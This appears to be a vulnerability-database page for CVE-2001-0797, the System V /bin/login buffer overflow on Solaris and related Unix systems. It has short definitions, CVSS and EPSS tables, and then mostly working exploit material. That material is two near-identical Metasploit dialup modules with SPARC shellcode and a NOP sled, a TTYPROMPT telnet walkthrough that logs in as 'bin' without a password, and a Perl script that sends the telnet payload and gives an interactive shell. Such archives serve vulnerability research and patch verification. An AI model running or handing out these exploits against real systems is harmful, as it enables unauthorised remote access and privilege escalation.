CPE, which stands for Common Platform Enumeration, is a standardized scheme for naming hardware, software, and operating systems. CPE provides a structured naming scheme to uniquely identify and classify information technology systems, platforms, and packages based on certain attributes such as vendor, product name, version, update, edition, and language.
CWE, or Common Weakness Enumeration, is a comprehensive list and categorization of software weaknesses and vulnerabilities. It serves as a common language for describing software security weaknesses in architecture, design, code, or implementation that can lead to vulnerabilities.
CAPEC, which stands for Common Attack Pattern Enumeration and Classification, is a comprehensive, publicly available resource that documents common patterns of attack employed by adversaries in cyber attacks. This knowledge base aims to understand and articulate common vulnerabilities and the methods attackers use to exploit them.
Services & Price
Help & Info
Search : CVE id, CWE id, CAPEC id, vendor or keywords in CVE
Buffer overflow in login in various System V based operating systems allows remote attackers to execute arbitrary commands via a large number of arguments through services such as telnet and rlogin.
CVE Informations
Metrics
Metrics
Score
Severity
CVSS Vector
Source
V2
10
AV:N/AC:L/Au:N/C:C/I:C/A:C
nvd@nist.gov
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
89.92%
–
–
2023-03-12
–
–
–
97.43%
–
2023-04-23
–
–
–
97.39%
–
2023-11-05
–
–
–
97.36%
–
2024-02-11
–
–
–
97.24%
–
2024-06-02
–
–
–
97.21%
–
2024-12-22
–
–
–
97.03%
–
2025-01-19
–
–
–
97.03%
–
2025-03-18
–
–
–
–
91.66%
2025-04-22
–
–
–
–
91.7%
2025-04-22
–
–
–
–
91.7,%
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
##
# $Id: manyargs.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::Dialup
def initialize(info = {})
super(update_info(info,
'Name' => 'System V Derived /bin/login Extraneous Arguments Buffer Overflow',
'Description' => %q{
This exploit connects to a system's modem over dialup and exploits
a buffer overlflow vulnerability in it's System V derived /bin/login.
The vulnerability is triggered by providing a large number of arguments.
},
'References' =>
[
[ 'CVE', '2001-0797'],
[ 'OSVDB', '690'],
[ 'OSVDB', '691'],
[ 'BID', '3681'],
[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2002-10/0014.html'],
[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2004-12/0404.html'],
],
'Version' => '$Revision: 9669 $',
'Author' =>
[
'I)ruid',
],
'Arch' => ARCH_TTY,
'Platform' => ['unix'],
'License' => MSF_LICENSE,
'Payload' =>
{
'Space' => 3000,
'BadChars' => '',
'DisableNops' => true,
},
'Targets' =>
[
[ 'Solaris 2.6 - 8 (SPARC)',
{
'Platform' => 'unix',
'Ret' => 0x00027184,
# Solaris/SPARC special shellcode (courtesy of inode)
# execve() + exit()
'Shellcode' =>
"\x94\x10\x20\x00\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc" +
"\xa2\x14\x63\x68\xd4\x23\xbf\xfc\xe2\x23\xbf\xf8\xe0\x23\xbf\xf4" +
"\x90\x23\xa0\x0c\xd4\x23\xbf\xf0\xd0\x23\xbf\xec\x92\x23\xa0\x14" +
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x82\x10\x20\x01\x91\xd0\x20\x08",
'NOP' => "\x90\x1b\x80\x0e",
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 12 2001'))
register_options(
[
# OptString.new('USER', [true, 'User to log in as', 'bin']),
], self.class)
end
def buildbuf
print_status("Targeting: #{self.target.name}")
retaddr = self.target.ret
shellcode = self.target['Shellcode']
nop = self.target['NOP']
user = datastore['USER']
command = datastore['COMMAND'] + "\n"
# prepare the evil buffer
i = 0
buf = ''
# login name
buf[i,4] = 'bin '
i += 4
# return address
buf[i,4] = [retaddr].pack('N')
i += 4
buf[i,1] = ' '
i += 1
# trigger the overflow
(0...60).each {|c|
buf[i,2] = 'a '
i += 2
}
# padding
buf[i,4] = ' BBB'
i += 4
# nop sled and shellcode
(0...398).each {|c|
buf[i,nop.size] = nop
i += nop.size
}
shellcode.each_byte {|b|
c = b.chr
case 'c'
when "\\"
buf[i,2] = "\\\\"
i += 2
when "\xff", "\n", " ", "\t"
buf[i,1] = "\\"
buf[i+1,1] = (((b & 0300) >> 6) + '0').chr
buf[i+2,1] = (((b & 0070) >> 3) + '0').chr
buf[i+3,1] = ( (b & 0007) + '0').chr
i += 4
else
buf[i,1] = c
i += 1
end
}
# TODO: need to overwrite/skip the last byte of shellcode?
#i -= 1
# padding
buf[i,4] = 'BBB '
i += 4
# pam_handle_t: minimal header
buf[i,16] = 'CCCCCCCCCCCCCCCC'
i += 16
buf[i,4] = [retaddr].pack('N')
i += 4
buf[i,4] = [0x01].pack('N')
i += 4
# pam_handle_t: NULL padding
(0...52).each {|c|
buf[i,4] = [0].pack('N')
i += 4
}
# pam_handle_t: pameptr must be the 65th ptr
buf[i,9] = "\x00\x00\x00 AAAA\n"
i += 9
return buf
end
def exploit
buf = buildbuf
print_status("Dialing Target")
if not connect_dialup
print_error("Exiting.")
return
end
print_status("Waiting for login prompt")
res = dialup_expect(/ogin:\s/i, 10)
#puts Rex::Text.to_hex_dump(res[:buffer])
if not res[:match]
print_error("Login prompt not found... Exiting.")
disconnect_dialup
return
end
# send the evil buffer, 256 chars at a time
print_status("Sending evil buffer...")
#puts Rex::Text.to_hex_dump(buf)
len = buf.length
p = 0
while(len > 0) do
i = len > 0x100 ? 0x100 : len
#puts Rex::Text.to_hex_dump(buf[p,i])
dialup_puts(buf[p,i])
len -= i
p += i
# if len > 0
# puts Rex::Text.to_hex_dump("\x04")
# dialup_puts("\x04") if len > 0
# end
select(nil,nil,nil,0.5)
end
# wait for password prompt
print_status("Waiting for password prompt")
res = dialup_expect(/assword:/i, 30)
#puts Rex::Text.to_hex_dump(res[:buffer])
if not res[:match]
print_error("Target is likely not vulnerable... Exiting.")
disconnect_dialup
return
end
print_status("Password prompt received, waiting for shell")
dialup_puts("pass\n")
res = dialup_expect(/#\s/i, 20)
#puts Rex::Text.to_hex_dump(res[:buffer])
if not res[:match]
print_error("Shell not found.")
print_error("Target is likely not vulnerable... Exiting.")
disconnect_dialup
return
end
print_status("Success!!!")
handler
disconnect_dialup
end
end
Publication date : 2002-11-01 23h00 +00:00 Author : Jonathan S. EDB Verified : Yes
Solaris TTYPROMPT Security Vulnerability (Telnet)
This vulnerability is very simple to exploit, since it does not require
any code to be compiled by an attacker. The vulnerability only requires
the attacker to simply define the environment variable TTYPROMPT to a
6-character string, inside telnet. Jonathan believes this overflows an
integer inside login, which specifies whether the user has been
authenticated (just a guess).
Once connected to the remote host, you must type the username, followed
by 64 " c"s, and a literal "\n". You will then be logged in as the user
without any password authentication. This should work with any account
except root (unless remote root login is allowed).
Example:
coma% telnet
telnet> environ define TTYPROMPT abcdef
telnet> o localhost
SunOS 5.8
bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
Last login: whenever
$ whoami bin
# milw0rm.com [2002-11-02]
source: https://www.securityfocus.com/bid/3681/info
The 'login' program is used in UNIX systems to authenticate users with a username and password. The utility is typically invoked at the console, by 'telnetd', 'rlogind', and if configured to do so, SSH.
Versions of 'login' descended from System V UNIX contain a buffer overflow when handling environment variables. Several operating systems such as Solaris/SunOS, HP-UX, AIX, IRIX, and Unixware contain vulnerable versions of 'login'.
Unauthenticated clients can exploit this issue to execute arbitrary code as root. On systems where 'login' is installed setuid root, local attackers can elevate privileges.
#!/usr/bin/perl
#
# Date: 09/01/2003
# Author: snooq [http://www.angelfire.com/linux/snooq/]
#
# I coded this script to demo how to login to a Solaris box without
# password as 'bin'. Nothing new, it's an old bug which dates back
# to Dec 2001.
#
# And, there are already several versions of exploits circulating
# in the wild for at least a year now.
#
# Due to uninformed/incompetent/ignorant sysadmins, there are still
# quite a number of vulnerable machines out there.
#
# 'root' remote login is not allowed by defaut. So, unless, it's
# a misconfigured box, you can only go as high as 'bin'. However,
# once you are dropped into a shell, further priviledge escalation is
# very possible.
#
# Background info
# ===============
# From http://www.mail-archive.com/bugtraq@securityfocus.com/msg09281.html
#
# [quote]
# The problem is there exists an authentication flag called the "fflag"
# just after the array that gets overflowed in the .bss segment. This is
# an array of char pointers so when it is overflowed because of an
# mismanagement on the indexing of this array the fflag gets overwritten
# with an valid address on .bss segment. this is good enough to satify
# the if(fflag) condition and spawn a shell.
# [/quote]
#
# For more info about this bug, go to:
# http://www.cert.org/advisories/CA-2001-34.html
#
# Disclaimer
# ==========
# This is meant for you to do a quick check own your systems only.
# The author shall not be held responsible for any illegal use
# of this code.
#
# -> some asked 'why code another one?'
# I'm bored.. I guess.... been using other ppl's tools... it's time
# to write my own.. so that I have a reason to feel proud too...
#
# -> again, some asked 'why not in C?'
# ok... I'm lame.. my C sucks... my Perl sucks too...
# I'm not a professional programmer anyway... =p
#
# As usual, any comments or flames, go to jinyean at hotmail.com
#
use Socket;
use FileHandle;
if ($ARGV[0] eq '') {
print "Usage: $0 <host>\n";
exit;
}
$payload="\xff\xfc\x18" # Won't terminal type
."\xff\xfc\x1f" # Won't negotiate window size
."\xff\xfc\x21" # Won't remote flow control
."\xff\xfc\x23" # Won't X display location
."\xff\xfb\x22" # Will linemode
."\xff\xfc\x24" # Won't environment option
."\xff\xfb\x27" # Will new environment option
."\xff\xfb\x00" # Will binary transmission
."\xff\xfa\x27\x00" # My new environ option
."\x00\x54\x54\x59\x50\x52\x4f\x4d\x50\x54" # 'TTYPROMPT'
."\x01\x61\x62\x63\x64\x65\x66" # 'abcdef', any 6 chars will do
."\xff\xf0"; # Suboption end
$port=23;
$user="bin"; # You may change this to another user
$addr=getaddr($ARGV[0]);
for ($i;$i<65;$i++) {
$user.=" c"; # Again, any char will do
}
socket(SOCKET,PF_INET,SOCK_STREAM,(getprotobyname('tcp'))[2]);
connect(SOCKET,pack('Sna4x8',AF_INET,$port,$addr,2)) || die "Can't connect: $!\n";
print "/bin/login array mismanagment exploit by snooq (jinyean\@hotmail.com)\n";
print "Connected. Wait for a shell....\n";
SOCKET->autoflush();
$pid=fork;
if ($pid) { # Parent reads
send(SOCKET, $payload, 0);
send(SOCKET, "$user\n", 0);
read(SOCKET,$buff,69); # Read the garbage
while (<SOCKET>) {;
print STDOUT $_;
}
}
else { # Child sends
print SOCKET while (<STDIN>);
close SOCKET;
}
exit;
sub getaddr {
my $host=($_[0]);
my $n=$host;
$n=~tr/\.//d;
if ($n=~m/\d+/) {
return pack('C4',split('\.',$host));
}
else {
return (gethostbyname($host))[4];
}
}
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Dialup
def initialize(info = {})
super(update_info(info,
'Name' => 'System V Derived /bin/login Extraneous Arguments Buffer Overflow',
'Description' => %q{
This exploit connects to a system's modem over dialup and exploits
a buffer overlflow vulnerability in it's System V derived /bin/login.
The vulnerability is triggered by providing a large number of arguments.
},
'References' =>
[
[ 'CVE', '2001-0797'],
[ 'OSVDB', '690'],
[ 'OSVDB', '691'],
[ 'BID', '3681'],
[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2002-10/0014.html'],
[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2004-12/0404.html'],
],
'Version' => '$Revision: 6479 $',
'Author' =>
[
'I)ruid',
],
'Arch' => ARCH_TTY,
'Platform' => ['unix'],
'License' => MSF_LICENSE,
'Payload' =>
{
'Space' => 3000,
'BadChars' => '',
'DisableNops' => true,
},
'Targets' =>
[
['Solaris 2.6 - 8 (SPARC)', {
'Platform' => 'unix',
'Ret' => 0x00027184,
# Solaris/SPARC special shellcode (courtesy of inode)
# execve() + exit()
'Shellcode' =>
"\x94\x10\x20\x00\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc" +
"\xa2\x14\x63\x68\xd4\x23\xbf\xfc\xe2\x23\xbf\xf8\xe0\x23\xbf\xf4" +
"\x90\x23\xa0\x0c\xd4\x23\xbf\xf0\xd0\x23\xbf\xec\x92\x23\xa0\x14" +
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x82\x10\x20\x01\x91\xd0\x20\x08",
'NOP' => "\x90\x1b\x80\x0e",
} ],
],
'DefaultTarget' => 0
))
register_options(
[
# OptString.new('USER', [true, 'User to log in as', 'bin']),
], self.class
)
deregister_options(
)
end
def buildbuf
print_status("Targeting: #{self.target.name}")
retaddr = self.target.ret
shellcode = self.target['Shellcode']
nop = self.target['NOP']
user = datastore['USER']
command = datastore['COMMAND'] + "\n"
# prepare the evil buffer
i = 0
buf = ''
# login name
buf[i,4] = 'bin '
i += 4
# return address
buf[i,4] = [retaddr].pack('N')
i += 4
buf[i,1] = ' '
i += 1
# trigger the overflow
(0...60).each {|c|
buf[i,2] = 'a '
i += 2
}
# padding
buf[i,4] = ' BBB'
i += 4
# nop sled and shellcode
(0...398).each {|c|
buf[i,nop.size] = nop
i += nop.size
}
shellcode.each_byte {|b|
c = b.chr
case 'c'
when "\\"
buf[i,2] = "\\\\"
i += 2
when "\xff", "\n", " ", "\t"
buf[i,1] = "\\"
buf[i+1,1] = (((b & 0300) >> 6) + '0').chr
buf[i+2,1] = (((b & 0070) >> 3) + '0').chr
buf[i+3,1] = ( (b & 0007) + '0').chr
i += 4
else
buf[i,1] = c
i += 1
end
}
# TODO: need to overwrite/skip the last byte of shellcode?
#i -= 1
# padding
buf[i,4] = 'BBB '
i += 4
# pam_handle_t: minimal header
buf[i,16] = 'CCCCCCCCCCCCCCCC'
i += 16
buf[i,4] = [retaddr].pack('N')
i += 4
buf[i,4] = [0x01].pack('N')
i += 4
# pam_handle_t: NULL padding
(0...52).each {|c|
buf[i,4] = [0].pack('N')
i += 4
}
# pam_handle_t: pameptr must be the 65th ptr
buf[i,9] = "\x00\x00\x00 AAAA\n"
i += 9
return buf
end
def exploit
buf = buildbuf
print_status("Dialing Target")
if not connect_dialup
print_error("Exiting.")
return
end
print_status("Waiting for login prompt")
res = dialup_expect(/ogin:\s/i, 10)
#puts Rex::Text.to_hex_dump(res[:buffer])
if not res[:match]
print_error("Login prompt not found... Exiting.")
disconnect_dialup
return
end
# send the evil buffer, 256 chars at a time
print_status("Sending evil buffer...")
#puts Rex::Text.to_hex_dump(buf)
len = buf.length
p = 0
while(len > 0) do
i = len > 0x100 ? 0x100 : len
#puts Rex::Text.to_hex_dump(buf[p,i])
dialup_puts(buf[p,i])
len -= i
p += i
# if len > 0
# puts Rex::Text.to_hex_dump("\x04")
# dialup_puts("\x04") if len > 0
# end
sleep 0.5
end
# wait for password prompt
print_status("Waiting for password prompt")
res = dialup_expect(/assword:/i, 30)
#puts Rex::Text.to_hex_dump(res[:buffer])
if not res[:match]
print_error("Target is likely not vulnerable... Exiting.")
disconnect_dialup
return
end
print_status("Password prompt received, waiting for shell")
dialup_puts("pass\n")
res = dialup_expect(/#\s/i, 20)
#puts Rex::Text.to_hex_dump(res[:buffer])
if not res[:match]
print_error("Shell not found.")
print_error("Target is likely not vulnerable... Exiting.")
disconnect_dialup
return
end
print_status("Success!!!")
handler
disconnect_dialup
end
end